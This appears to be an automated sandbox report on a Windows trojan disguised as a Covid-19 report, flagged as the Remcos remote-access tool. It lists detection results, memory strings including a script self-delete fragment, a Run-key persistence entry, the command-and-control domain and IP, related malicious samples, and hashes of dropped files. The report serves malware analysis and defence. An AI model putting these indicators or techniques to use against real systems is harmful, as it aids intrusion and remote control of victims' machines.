                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421704593.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386521048.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388439070.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388390294.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421834849.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418832919.0000000004D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421808057.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421744141.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388650467.00000000048A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418729526.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388336916.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418713297.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.417154110.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386874226.00000000049F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421731075.000000000188B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388305317.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388273489.00000000048C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386594878.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422168272.0000000002FA0000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421790934.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386755735.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386645318.00000000048A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
                Detected Remcos RATShow sources
                Source: xdhqeufpq.pif, 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
                Source: xdhqeufpq.pif, 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
                Source: RegSvcs.exeString found in binary or memory: Remcos_Mutex_Inj
                Source: RegSvcs.exe, 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
                Source: xdhqeufpq.pif, 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
                Source: xdhqeufpq.pif, 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
                Source: RegSvcs.exeString found in binary or memory: Remcos_Mutex_Inj
                Source: RegSvcs.exe, 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: cmd.exe6_2_013B2B8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: cmd.exe12_2_00B02B8A

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsCommand and Scripting Interpreter12Application Shimming1Application Shimming1Obfuscated Files or Information2Input Capture121Account Discovery1Remote Desktop ProtocolInput Capture121Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsService Execution2Windows Service1Access Token Manipulation1Software Packing2Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Windows Service1DLL Side-Loading1NTDSFile and Directory Discovery4Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptProcess Injection422Masquerading11LSA SecretsSystem Information Discovery35SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSecurity Software Discovery121Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection422Proc FilesystemVirtualization/Sandbox Evasion2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Covid-19 Data Report Google Checklist.exe49%VirustotalBrowse
                Covid-19 Data Report Google Checklist.exe57%ReversingLabsWin32.Trojan.Woreflint

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\84086963\xdhqeufpq.pif55%VirustotalBrowse
                C:\84086963\xdhqeufpq.pif31%MetadefenderBrowse
                C:\84086963\xdhqeufpq.pif50%ReversingLabsWin32.Trojan.Generic

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.3.xdhqeufpq.pif.49d0a88.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.3.xdhqeufpq.pif.4d70a88.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.3.xdhqeufpq.pif.4d30a78.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.3.xdhqeufpq.pif.49d0a88.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                6.2.RegSvcs.exe.13b0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                12.2.RegSvcs.exe.b00000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                8.3.xdhqeufpq.pif.4d70a88.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.3.xdhqeufpq.pif.4a112a0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.3.xdhqeufpq.pif.4d70a88.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.3.xdhqeufpq.pif.49d0a88.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.3.xdhqeufpq.pif.4db0a98.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.3.xdhqeufpq.pif.4990a78.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                cato.fingusti.club7%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                cato.fingusti.club7%VirustotalBrowse
                cato.fingusti.club0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cato.fingusti.club
                		79.134.225.107
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                cato.fingusti.clubtrue
                • 7%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                79.134.225.107
                		cato.fingusti.clubSwitzerland
                		6775FINK-TELECOM-SERVICESCHtrue

                Private

                IP
                192.168.2.1

                General Information

                Joe Sandbox Version:33.0.0 White Diamond
                Analysis ID:479063
                Start date:07.09.2021
                Start time:15:29:22
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 47s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Covid-19 Data Report Google Checklist.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:24
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@8/80@1/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 44.3% (good quality ratio 32.2%)
                • Quality average: 55%
                • Quality standard deviation: 40.6%
                HCA Information:Failed
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 20.82.210.154, 131.253.33.200, 13.107.22.200, 23.211.6.115, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86
                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:30:40AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate c:\84086963\XDHQEU~1.PIF c:\84086963\fqficjon.emu
                15:30:42API Interceptor882x Sleep call for process: RegSvcs.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                79.134.225.107SecuriteInfo.com.Trojan.DownLoader36.26524.9571.exeGet hashmaliciousBrowse
                  O8Ii8MW7rn.exeGet hashmaliciousBrowse
                    Le8z5e90IO.exeGet hashmaliciousBrowse
                      LA99293P02.xlsGet hashmaliciousBrowse
                        PO 2413.exeGet hashmaliciousBrowse
                          myups.exeGet hashmaliciousBrowse
                            scanned.pdf.copy.documents.outstanding.exeGet hashmaliciousBrowse
                              69Invoice approval.pdf.exeGet hashmaliciousBrowse
                                52Amended Purchase order for your reference.exeGet hashmaliciousBrowse
                                  21PO10092019.exeGet hashmaliciousBrowse
                                    40wellsfargo Remittance.exeGet hashmaliciousBrowse
                                      22stone.exeGet hashmaliciousBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        cato.fingusti.clubNotice to submit_pdf.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        Notice_to_submit.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        IM0003057615_pdf.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        Notice to submit_pdf.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        Rules & Regulation (IRR)_pdf.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        wNxb2V5PKj.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        n7dIHuG3v6.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        F6JT4fXIAQ.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        Waybill Doc_pdf.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        SecuriteInfo.com.Trojan.Win32.Save.a.31706.exeGet hashmaliciousBrowse
                                        • 79.134.225.92
                                        10UNv6Ul0W.exeGet hashmaliciousBrowse
                                        • 79.134.225.92

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        FINK-TELECOM-SERVICESCHPrice Request #20210907.exeGet hashmaliciousBrowse
                                        • 79.134.225.95
                                        Quote_request.exeGet hashmaliciousBrowse
                                        • 79.134.225.95
                                        tNC1w6dXQ9.exeGet hashmaliciousBrowse
                                        • 79.134.225.76
                                        7PAX _Trip Itinerary Details.pdf.vbsGet hashmaliciousBrowse
                                        • 79.134.225.27
                                        RRGpqq27Rl.exeGet hashmaliciousBrowse
                                        • 79.134.225.21
                                        0sTLyRfo4M.exeGet hashmaliciousBrowse
                                        • 79.134.225.53
                                        DecodedExe.exeGet hashmaliciousBrowse
                                        • 79.134.225.27
                                        BX3RCBzzgf.exeGet hashmaliciousBrowse
                                        • 79.134.225.25
                                        PrYRLweSZL.exeGet hashmaliciousBrowse
                                        • 79.134.225.87
                                        Nj9MXR9ZsK.exeGet hashmaliciousBrowse
                                        • 79.134.225.21
                                        TTCOPY.docGet hashmaliciousBrowse
                                        • 79.134.225.21
                                        DetailedBooking.jsGet hashmaliciousBrowse
                                        • 79.134.225.10
                                        DetailedBooking.jsGet hashmaliciousBrowse
                                        • 79.134.225.10
                                        etat_comp_du27082021.xlamGet hashmaliciousBrowse
                                        • 79.134.225.73
                                        2dnUPJR1kl.exeGet hashmaliciousBrowse
                                        • 79.134.225.61
                                        secondupdate.jsGet hashmaliciousBrowse
                                        • 79.134.225.10
                                        update.jsGet hashmaliciousBrowse
                                        • 79.134.225.10
                                        secondupdate.jsGet hashmaliciousBrowse
                                        • 79.134.225.10
                                        XTziUJe6uK.exeGet hashmaliciousBrowse
                                        • 79.134.225.54
                                        qQ2SuVsWVP.exeGet hashmaliciousBrowse
                                        • 79.134.225.44

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\84086963\xdhqeufpq.pifPDA_pdf.exeGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\84086963\afpukhvau.ini
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):546
                                          Entropy (8bit):5.513325500509442
                                          Encrypted:false
                                          SSDEEP:12:0vliPh/DE1rYaG4uTh+mRiMdDyXQN2k06Ev8Uigr47Kgl/f:0vEpber9Nu9+uX7Fuigr4egl/f
                                          MD5:BADC3BAC3CB07596DDB4E9F55FAB409E
                                          SHA1:6C0DFCE7E92F5EB498416094B25E78FBDB7A58EF
                                          SHA-256:DFBBF55CB02264D1791251D6AB8F3F7AA678B9CE450C81A237358E3325AE2B0F
                                          SHA-512:2CABCF707365751DDF3839C3F2BD0E75721045A2B3050F55F56E6C08E105B68F45677E61A3E752D3C7E23F27A1DE1CA90EEC23A18F716E1AB0C253FE278603B1
                                          Malicious:false
                                          Reputation:low
                                          Preview: cpxj8DdE1s3Eb0Xpz6..uTZ5s91lx00N7Xcs2k8cNAy6g8a83M7ToI3Lx80S8gT998uJV4Pf9y370zD9q20z1KyC24Goa4607I6q0w50mlRBhk77koMsV0U9ZJqpxr4P8m1OTY5cR2J8t12..24B7c0x84590y479B1c26Wm31M9Yw0u2tm61..36w9MY15WBP02XaXhOsksbDS06z1g8l1u4..0c08b7hoX6lys5jb1Iz3v96YfLa7964nJ17t3F6Y3219Ge7g9n0x4g26u251t547E110TlJtG386K153uZW992U3sc4hQWo2K61F27FWft29342nr44r..oPZ1lu734115txIn5rn86j3nrW53t7XZ6U793o7613g578w4WC6sl6x3G721W47y6wWBrV242v796oa705YCZ18lkedKC28378397..9P79cn7102F6h14i0woLt07N079uSg366nEC0aW61KA27lzzxiJ209m3eAk7N8324BAD74YQRT9BT587664WimZZs205rc0TpM24m921..
                                          C:\84086963\arpja.icm
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):616
                                          Entropy (8bit):5.5409688853949115
                                          Encrypted:false
                                          SSDEEP:12:8Hkk8P8MybV1Ua8q8NdmYW+qjUKHfr9FdKoZuX+H+cqTTMV3Gu1Vz0mf3ei8/sq+:8Hk5ybVDEN6+qAK/LdKQuX+HwTTM1Z0u
                                          MD5:E4A5818D0CC191A0C2BFADB16E6BBA6D
                                          SHA1:1E0254C21802099C6C07937344DEC725E7C81790
                                          SHA-256:84F6A5D5C69BD450CBB51835054977B4467E9E9421E589F97322551E6BAB2503
                                          SHA-512:A451C6FBDFD4D0AC33FB030348F403EFD80E26960C66DDC2E34EDD46EA2E9BC3F8E45C75B62DA82D3EDD7A1259EA4E73FC747182BE627C698FB06541295F1243
                                          Malicious:false
                                          Reputation:low
                                          Preview: 9vH6oyQ61Zw539A90401x1wP2AaL96QNe9D54718456VoXWM091aoQP3s47029G8b3eEP30uS7b4gW73fQVAB666059ZJKT8Kn52uH3158800Mr9d61HizBl0t3ky72IuO204XO7D70kc97bY83L82w9p120862KA6Yfm085a849Q4..m8NwRCVlIz1xlp0Et3dG232T1YH4007q4803999C3z6FO80..137b34rS43963d7cq..9Wn9i..q4B0a29513jylYg2CN52909B62SNr0i9u0w10FotXTB37D2D1Xrj..4S0tmE60p373FRA0OZ7et6L14A5NM610rNH8qbk74i029hgO1Rk5bW42V8JwZJO8bP5xvZ9Df2..33Z51P70X677m0c93..o967fR3pmuHx1O8LpX96896wwg4NLL2jsEX660L5345H4Z7O31qLBCC5250Tu655k1bg80l5o5yY2SawPY73ng5..b26C23KmYv53o0148438G53cL23QeSh6Q8TSyZ0AJf8542KvKRmV6H7wB7mr0t47ZmxQ1F18s0W32v2Es2K2s7349s7n60365KIxZ36qmeGZMdDsTEey5DQ612Dl9..
                                          C:\84086963\awcpm.bin
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):516
                                          Entropy (8bit):5.419775893386141
                                          Encrypted:false
                                          SSDEEP:12:igiMsV1D/yKFG70MRMZ+4iqUUPTWPXFhPjO2JMTLy:2r1NE0zZXaV5jOUEy
                                          MD5:B13F7B0957A4C2943598D93BA56E16F2
                                          SHA1:CAC7070FE1AEB2EF13D83EFC39F82B38385017C8
                                          SHA-256:0875CA5488594E1E7D2E9551C6A7E2EC7BDA5F8E84D19DA1E747AFB9539F5AFA
                                          SHA-512:27D592B6353CA79740B677EE1AD378EAF2ADE86CB41791DACB45E0B0E463B899165E1C9A4B0144310AAB8DFDFE4ED5A2EFC65DDC30B7F1703AA4E55CAB617772
                                          Malicious:false
                                          Reputation:low
                                          Preview: 05g2B345963iHk919ZZ9GnHFh9m126hH5F923b040ggvXg6oM4567pbg74lG8gb32s2..70p64i0XHw46of2q4n7c0z762F72d06cmWx8xtu004l713xo1F69m4ny78UF4Uni8Ly2133V377MNDm68e8992G1o6211LnqR..55q4C19P6Ji049xr1uj1e5Z6913Nxs2118v0I60Aro9xTK7227zkO1LERi962H07nv2RR68wih4Q13B474P3O17m80481aj162M0kqM7Jb965N5..6hU7WWx30753ty7o6896JV655Ud9TI80CU7827k46K6B135639Ot8Y6259g70vF1O8vM1r9NaGIm8283cxNJm03VP012PSABIX07Jv5sHlg7Zk684880d3266u6h2HZ8..tY1mt6kq86d2x4giN0dd8X6VjnyYw592kBt222R1Z8r611kK93lQjy42c2nO0S79u0xPp7387562eFh03K913982oyrV878051xYX7D..
                                          C:\84086963\bdrigsrhuf.txt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):569
                                          Entropy (8bit):5.505520204369817
                                          Encrypted:false
                                          SSDEEP:12:yrWqGvdQX8Cv8vNl/GL9DxQnAdxtq84tPJ5VgwrRjgjSznyN+pbvV:0WqGvdQX8CvuNlyynAdlyJteuu6bN
                                          MD5:3BF4F088C97D5358C0EA43F56C1EED48
                                          SHA1:71963715BDF4B5FD710053C346D46C182B5984CC
                                          SHA-256:9C790F569691DC42561431156E857D8EDC98FF1AFEEA0E10D5EB1AE4C0C253CD
                                          SHA-512:84461500EED5A993878564C0B87421774B3C9F950935BE02DBD29F04565F0684111B3609E937C1E66CD411222D6572A043073575B3B867A6D8B00AB136C5DC60
                                          Malicious:false
                                          Reputation:low
                                          Preview: b59S921eH1n1H..U11uz7K9y194H0LI8MCmU2uuo3s2H4spQh14q2Ye811191uR3i1CXyB8T37x0EONH557q2N527s..61AND3J07A7c8nS4yVz71VriI93Y1l9q2Cu2x84071l3d93O1q4le7D022914b2O8est4N541HN6P693eD6J9C32..6mAa69549N0XGfX6972J458FGFTc2nd3h229h312PF2F2uv03z849o441ocBd8w28398ww4N8507S89032x7T64h82e69la8Dm285..U8aWT19b3145O3VIdn131l3q05afeg8He61Xy32l8NXE9X12dw3iT59IpJ..A3SqLTWK4t9vjT21sUcd257Ib23OyY..0t15Sf9882iWqEE4S7EhUZ8ml14E48t5C82hk9cz8896Df4RooX36D4074o165l66r9V4iObw1qPn5E3P7OF8gJS9t0868T3E734DoVa7V0h98f4xj..52St62XtWEAhgViSun4k622gD3i2lb9lOfRm60390PfTZVCc885jV120I39SP5a6lYBMb8m95v..
                                          C:\84086963\bpcfr.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):534
                                          Entropy (8bit):5.536234103479081
                                          Encrypted:false
                                          SSDEEP:12:IP4cs9rx4GT7yLRX0bQwWEAdTm7vgt7KHdlUARIvZ:qWyeyyEwW3dC4IvUAKvZ
                                          MD5:FC4F14DEC173BF5B13E9426E52B36963
                                          SHA1:504D8235FD860BC8E6BABB40488561F3D5F3DB82
                                          SHA-256:88775FCC858945DFAE71815DDE7FC14ABC036BCEBFAD385FABF86EA9165D1AB9
                                          SHA-512:01FEA00424B4F83A192FB04AE0038D234D4214621B8E73F5258A675FDF19CDA74EE8C24D20A982FCA0E2EE9707E73B3A72CF24A26F6C975E90E225122FB14AA8
                                          Malicious:false
                                          Reputation:low
